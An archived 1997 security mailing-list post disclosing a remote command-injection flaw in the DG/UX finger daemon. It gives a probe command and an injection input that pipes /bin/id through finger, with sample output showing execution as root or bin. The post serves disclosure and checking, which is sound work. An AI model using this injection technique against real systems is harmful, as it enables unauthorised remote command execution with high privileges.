[308] in Best-of-Security
BoS: dgux in.fingerd vulnerability
daemon@ATHENA.MIT.EDU (George Imburgia)
Thu Aug 14 03:50:11 1997
Date: Mon, 11 Aug 1997 12:32:38 -0400
Reply-To: George Imburgia <gti@HOPI.DTCC.EDU>
From: George Imburgia <gti@HOPI.DTCC.EDU>
Errors-To: best-of-security-request@cyber.com.au
To: best-of-security@cyber.com.au
Resent-From: best-of-security@cyber.com.au
Another old bug that won't die.
The finger daemon that ships with dgux will allow a remote user to pipe
commands, often with uid root or bin.
To check for this vulnerability, simply use the RFC compliant syntax;
finger /W@host
If it returns something like this, it may be vulnerable;
Login name: /W In real life: ???
To see the uid in.fingerd is running as, try this;
finger "|/bin/id@host"
Often, you will see something like this;
uid=0(root) gid=0(root)
or;
uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= George Imburgia =
= Network Specialist, Computer Services =
= Office of the President =
= Delaware Tech =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
